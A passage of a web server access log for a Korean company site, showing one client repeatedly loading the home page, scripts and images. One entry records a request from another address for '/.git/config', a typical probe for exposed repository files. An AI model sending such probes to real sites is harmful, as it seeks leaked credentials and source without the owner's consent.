AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9889] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:51:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:05:10 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.3(0x17000321) NetType/WIFI Language/zh_CN" "-" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9918] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:29:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9918] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9918] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17988] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9918] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17988] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:42:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:05:56:58 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:56:58 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9918] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18028] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:01:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18028] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:05:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr 